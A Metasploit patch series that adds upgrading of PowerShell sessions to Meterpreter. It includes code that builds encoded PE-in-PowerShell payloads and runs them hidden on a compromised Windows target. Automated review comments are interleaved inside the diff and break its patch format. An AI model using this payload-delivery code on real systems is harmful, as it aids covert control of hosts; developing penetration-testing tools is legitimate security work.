From 4aae9b8272332da93ac198c6e9f59329b47ce92c Mon Sep 17 00:00:00 2001
From: Brent Cook
Date: Tue, 8 Sep 2015 15:37:42 +0200
Subject: [PATCH 1/4] support upgrading a powershell session to meterpreter
---
 lib/msf/base/sessions/powershell.rb | 7 +++++++
 lib/msf/ui/console/command_dispatcher/core.rb | 4 ++--
 2 files changed, 9 insertions(+), 2 deletions(-)
diff --git a/lib/msf/base/sessions/powershell.rb b/lib/msf/base/sessions/powershell.rb
index 6451af384d..3606745d7b 100644
--- a/lib/msf/base/sessions/powershell.rb
+++ b/lib/msf/base/sessions/powershell.rb
@@ -27,6 +27,13 @@ class Msf::Sessions::PowerShell < Msf::Sessions::CommandShell
 "powershell"
 end
 
+ #
+ # Returns the session platform.
+ #
+ def platform
+ "win"
+ end
+
 #
 # Returns the session description.
 #
diff --git a/lib/msf/ui/console/command_dispatcher/core.rb b/lib/msf/ui/console/command_dispatcher/core.rb
index 66dbb0af92..1eae4abfdd 100644
--- a/lib/msf/ui/console/command_dispatcher/core.rb
+++ b/lib/msf/ui/console/command_dispatcher/core.rb
@@ -1917,12 +1917,12 @@ class Core
 session.response_timeout = response_timeout
 end
 begin
- if session.type == 'shell'
+ if session.type.include? 'shell'
 session.init_ui(driver.input, driver.output)
 session.execute_script('post/multi/manage/shell_to_meterpreter')
 session.reset_ui
 else
- print_error("Session #{sess_id} is not a command shell session, skipping...")
+ print_error("Session #{sess_id} is not a command shell session, it is #{session.type}, skipping...")
 next
 end
 ensure
From 4cbe35e1b2292d24835a6d6cfe20acc025277729 Mon Sep 17 00:00:00 2001
From: Brent Cook
Date: Wed, 23 Sep 2015 22:08:32 -0500
Subject: [PATCH 2/4] specifically use shell or powershell
---
 lib/msf/ui/console/command_dispatcher/core.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/lib/msf/ui/console/command_dispatcher/core.rb b/lib/msf/ui/console/command_dispatcher/core.rb
index 1eae4abfdd..01713edc60 100644
--- a/lib/msf/ui/console/command_dispatcher/core.rb
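Review bot: The new `platform` method hard-codes "win" without saying why, even though it is the value the post module branches on (`case platform` / `when 'win'` in the shell_to_meterpreter hunk of the third patch). That coupling belongs in the header comment, for example `# Returns the session platform. Always "win": a PowerShell session is assumed to be a Windows host, and post/multi/manage/shell_to_meterpreter selects its transfer method on this value.` Should this session type ever be reachable from a non-Windows PowerShell host, this is the method to revisit.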
+++ b/lib/msf/ui/console/command_dispatcher/core.rb
@@ -1917,7 +1917,7 @@ class Core
 session.response_timeout = response_timeout
 end
 begin
- if session.type.include? 'shell'
+ if ['shell', 'powershell'].include?(session.type)
 session.init_ui(driver.input, driver.output)
 session.execute_script('post/multi/manage/shell_to_meterpreter')
 session.reset_ui
From 6468eb51b2767fff398fc4bab8a1a3640f0b5b96 Mon Sep 17 00:00:00 2001
From: jvazquez-r7
Date: Fri, 2 Oct 2015 15:26:42 -0500
Subject: [PATCH 3/4] Do changes to have into account powershell sesions are not cmd sessions
---
 lib/msf/base/sessions/powershell.rb | 3 +-
 lib/msf/core/exploit/powershell.rb | 2 +-
 lib/msf/core/post/common.rb | 7 ++++
 .../post/multi/manage/shell_to_meterpreter.rb | 40 ++++++++++++++-----
 4 files changed, 40 insertions(+), 12 deletions(-)
diff --git a/lib/msf/base/sessions/powershell.rb b/lib/msf/base/sessions/powershell.rb
index 3606745d7b..6e0f01d125 100644
--- a/lib/msf/base/sessions/powershell.rb
+++ b/lib/msf/base/sessions/powershell.rb
@@ -44,7 +44,7 @@ class Msf::Sessions::PowerShell < Msf::Sessions::CommandShell
 #
 # Takes over the shell_command of the parent
 #
- def shell_command(cmd)
+ def shell_command(cmd, timeout = 1800)
 # insert random marker
 strm = Rex::Text.rand_text_alpha(15)
 endm = Rex::Text.rand_text_alpha(15)
@@ -52,7 +52,6 @@ class Msf::Sessions::PowerShell < Msf::Sessions::CommandShell
 # Send the shell channel's stdin.
 shell_write(";'#{strm}'\n" + cmd + "\n'#{endm}';\n")
 
- timeout = 1800 # 30 minute timeout
 etime = ::Time.now.to_f + timeout
 buff = ""
 
diff --git a/lib/msf/core/exploit/powershell.rb b/lib/msf/core/exploit/powershell.rb
index 89d99fb00e..281d960bd7 100644
--- a/lib/msf/core/exploit/powershell.rb
+++ b/lib/msf/core/exploit/powershell.rb
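Review bot: Style point on `if ['shell', 'powershell'].include?(session.type)`: the literal array is rebuilt on every evaluation, and the `next` in the else branch (visible in the first patch's version of this hunk) suggests this sits inside a per-session loop. A frozen constant reads better and states intent: `UPGRADEABLE_SESSION_TYPES = %w[shell powershell].freeze` on the class, then `if UPGRADEABLE_SESSION_TYPES.include?(session.type)`. The enclosing method starts and ends outside the hunk.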
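Review bot: The `timeout` parameter added to `shell_command` is undocumented, and the only explanation of the 1800 value, the `# 30 minute timeout` comment, disappears with the local in the next hunk (`@@ -52,7 +52,6 @@`). Add a YARD line to the header comment: `# @param timeout [Numeric] seconds to wait for the end marker before returning what was read (default 1800 = 30 minutes)`. Because `etime = ::Time.now.to_f + timeout` now takes the caller's value unchanged, a caller passing `nil` (common.rb's new branch forwards its `time_out` argument as-is) would raise a TypeError instead of getting the old 30-minute default; whether nil can actually reach here I cannot tell from the hunks, so either guard with `timeout ||= 1800` or document that nil is not accepted. The method body continues outside both hunks.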
@@ -147,7 +147,7 @@ module Exploit::Powershell
 # @param ps_code [String] Powershell code
 # @param payload_arch [String] The payload architecture 'x86'/'x86_64'
 # @param encoded [Boolean] Indicates whether ps_code is encoded or not
- #
+ #ex
 # @return [String] Wrapped powershell code
 def run_hidden_psh(ps_code, payload_arch, encoded)
 arg_opts = {
diff --git a/lib/msf/core/post/common.rb b/lib/msf/core/post/common.rb
index 85e3af4d3a..00f2ddfa9e 100644
--- a/lib/msf/core/post/common.rb
+++ b/lib/msf/core/post/common.rb
@@ -198,6 +198,13 @@ module Msf::Post::Common
 
 end
 process.close
+ when /powershell/
+ if args.nil? || args.empty?
+ o = session.shell_command("#{cmd}", time_out)
+ else
+ o = session.shell_command("#{cmd} #{args}", time_out)
+ end
+ o.chomp! if o
 when /shell/
 if args.nil? || args.empty?
 o = session.shell_command_token("#{cmd}", time_out)
diff --git a/modules/post/multi/manage/shell_to_meterpreter.rb b/modules/post/multi/manage/shell_to_meterpreter.rb
index d871740401..e115c35829 100644
--- a/modules/post/multi/manage/shell_to_meterpreter.rb
+++ b/modules/post/multi/manage/shell_to_meterpreter.rb
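Review bot: The new `when /powershell/` arm in common.rb only works because it precedes `when /shell/`: that regex also matches "powershell", so swapping the arms would silently send PowerShell sessions back through `shell_command_token`. The ordering constraint should be written on the line itself: `when /powershell/ # must stay above /shell/, which also matches "powershell"`. Anchoring both patterns (`/\Apowershell\z/`) would remove the dependency, but since the surrounding arms use substring matches I would keep the style and add the comment. `"#{cmd}"` is a redundant interpolation copied from the shell arm; `cmd` alone is equivalent. The enclosing `case` and its method start and end outside the hunk.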
@@ -128,15 +128,37 @@ class Metasploit3 < Msf::Post
 
 case platform
 when 'win'
- if (have_powershell?) && (datastore['WIN_TRANSFER'] != 'VBS')
- vprint_status("Transfer method: Powershell")
- psh_opts = { :prepend_sleep => 1, :encode_inner_payload => true, :persist => false }
- cmd_exec(cmd_psh_payload(payload_data, psh_arch, psh_opts))
- else
- print_error('Powershell is not installed on the target.') if datastore['WIN_TRANSFER'] == 'POWERSHELL'
- vprint_status("Transfer method: VBS [fallback]")
- exe = Msf::Util::EXE.to_executable(framework, larch, lplat, payload_data)
- aborted = transmit_payload(exe)
+ if session.type == 'powershell'
+ template_path = File.join(Msf::Config.data_directory, 'templates', 'scripts')
+ psh_payload = case datastore['Powershell::method']
+ when 'net'
+ Rex::Powershell::Payload.to_win32pe_psh_net(template_path, payload_data)
+ when 'reflection'
+ Rex::Powershell::Payload.to_win32pe_psh_reflection(template_path, payload_data)
+ when 'old'
+ Rex::Powershell::Payload.to_win32pe_psh(template_path, payload_data)
+ when 'msil'
+ fail RuntimeError, 'MSIL Powershell method no longer exists'
+ else
+ fail RuntimeError, 'No Powershell method specified'
+ end
+
+ # prepend_sleep => 1
+ psh_payload = 'Start-Sleep -s 1;' << psh_payload
+
+ encoded_psh_payload = encode_script(psh_payload)
+ cmd_exec(run_hidden_psh(encoded_psh_payload, psh_arch, true))
+ else # shell
+ if (have_powershell?) && (datastore['WIN_TRANSFER'] != 'VBS')
+ vprint_status("Transfer method: Powershell")
+ psh_opts = { :prepend_sleep => 1, :encode_inner_payload => true, :persist => false }
+ cmd_exec(cmd_psh_payload(payload_data, psh_arch, psh_opts))
+ else
+ print_error('Powershell is not installed on the target.') if datastore['WIN_TRANSFER'] == 'POWERSHELL'
+ vprint_status("Transfer method: VBS [fallback]")
+ exe = Msf::Util::EXE.to_executable(framework, larch, lplat, payload_data)
+ aborted = transmit_payload(exe)
+ end
 end
 when 'python'
 vprint_status("Transfer method: Python")
From 953bfe1a818277c1478712de4efb0d661298198d Mon Sep 17 00:00:00 2001
From: jvazquez-r7
Date: Fri, 2 Oct 2015 15:29:03 -0500
Subject: [PATCH 4/4] Delete typo
---
 lib/msf/core/exploit/powershell.rb | 1 -
 1 file changed, 1 deletion(-)
diff --git a/lib/msf/core/exploit/powershell.rb b/lib/msf/core/exploit/powershell.rb
index 281d960bd7..94189d5c6f 100644
--- a/lib/msf/core/exploit/powershell.rb
+++ b/lib/msf/core/exploit/powershell.rb
@@ -147,7 +147,6 @@ module Exploit::Powershell
 # @param ps_code [String] Powershell code
 # @param payload_arch [String] The payload architecture 'x86'/'x86_64'
 # @param encoded [Boolean] Indicates whether ps_code is encoded or not
- #ex
 # @return [String] Wrapped powershell code
 def run_hidden_psh(ps_code, payload_arch, encoded)
 arg_opts = {
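Review bot: Error handling differs between the two new branches of `when 'win'` in shell_to_meterpreter.rb: on a powershell session an unrecognised `datastore['Powershell::method']` raises (`fail RuntimeError, 'No Powershell method specified'`) and aborts the module, while the shell branch reports with `print_error` and falls back to VBS. Unless aborting is deliberate, `print_error('No Powershell method specified'); return` matches the sibling branch and the module's existing style, and `fail RuntimeError, 'msg'` is simply `raise 'msg'` in idiomatic Ruby. The method-selection `case` plus the hand-written `'Start-Sleep -s 1;'` prepend duplicate what `cmd_psh_payload(payload_data, psh_arch, :prepend_sleep => 1, ...)` does for the shell branch, presumably minus the cmd.exe wrapping; moving the powershell-session path into a private helper such as `powershell_session_payload(payload_data)` with a one-line comment on that distinction would keep this branch readable. Note too that `aborted` is only assigned by the VBS fallback, so the powershell path leaves it nil just as the old code did; whether later code treats nil as success I cannot see from here. The enclosing method and its `case platform` start and end outside the hunk.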